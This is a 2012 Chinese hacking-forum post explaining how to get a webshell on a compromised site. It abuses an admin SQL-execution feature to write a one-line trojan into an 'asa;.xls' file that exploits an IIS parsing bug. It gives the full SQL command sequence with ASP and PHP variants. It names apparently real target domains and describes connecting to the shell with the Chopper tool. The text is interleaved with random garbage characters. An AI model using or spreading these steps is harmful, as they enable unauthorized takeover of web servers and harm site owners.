找回密码
 立即注册
查看: 2130|回复: 0
打印 上一主题 下一主题

ACCESS执行SQL命令导出一句话SHELL

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:53:58 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
好不容易进了后台,发现啥上传啊。备份啊多木有。! T- R6 P7 y, K
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的
8 ?& `3 f/ S7 j" [8 }7 r8 p7 X文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,$ i  j) _# V! V; p( b& E$ D/ m
然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:
( B2 \+ s  Y. ~1.create table cmd (a varchar(50))( _! y; r6 K. L% S% I% I, M
2.insert into cmd (a) values (‘‘)
+ ]. J) y. [, i8 _3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd
( U  ]1 p/ t& t% q+ [; g+ D(把表cmd的内容导出为物理路径的一个EXCEL文件)
" n! t: R2 K. c. k3 f- l4.drop table cmd
; b5 N3 F2 W" T利用IIS的BUG成功拿到了WEBSHELL。
' V( D7 H. Y9 @- W* f7 f# \
& ]7 m3 Y! ]  \/ P0 G直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话0 u6 C: \. S% W, f9 @, e3 ?' x

& @- r$ y( I9 l2 P' U* R* K* X/ b  SQL语句意思解释:! e7 F. ]% V8 v- V: w# s* [
  第一句
. q8 W! J! w& ]/ V/ b" W2 B& m! N% R  建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
! D1 G7 w& c! c7 T' Z3 H5 r+ T) {7 s% Q% g
  第二句; ~( y3 ~& x' C  g0 C7 x9 }) B; S
  在表cmd的a字段插入一句话木马' p% f3 C: B/ b
  第三句
5 e& B. ?. B8 z  把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件
3 y# U- d; N2 [9 @% C; z* Q- W% y- S1 K5 |8 Q
  第四句. a' D' u# f2 ]+ Q2 [1 g1 e
  删除建立的cmd表
4 {8 c( ~' E% I3 M& t' z2 Z
6 H4 u! [) @6 i, L% _  以下内容为测试:
2 x  T) S  L( V) b  Access利用后台SQL执行命令功能导出WebShell:7 V: t$ W! S% g/ U# M
  这个更简单:
7 p5 B  s! u2 t2 o8 y2 m) o  [ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]
% p* h0 o' e7 N9 M4 Y6 K  或者
4 ^! A( l* C: i4 m8 g# }1 h# q$ Y  [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]2 M8 {  U0 ~2 H( W: f8 l+ O) p; v
3 d0 h) w- r. w3 S3 m5 C- t% X
  后台有执行SQL语句功能(vote为已知表段); ^/ m/ q  `9 t2 `5 g+ o, A& c, ~
  希望对大家有所帮助拿shell的又一个思路$ J  C, K: u2 S% o: R- A
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表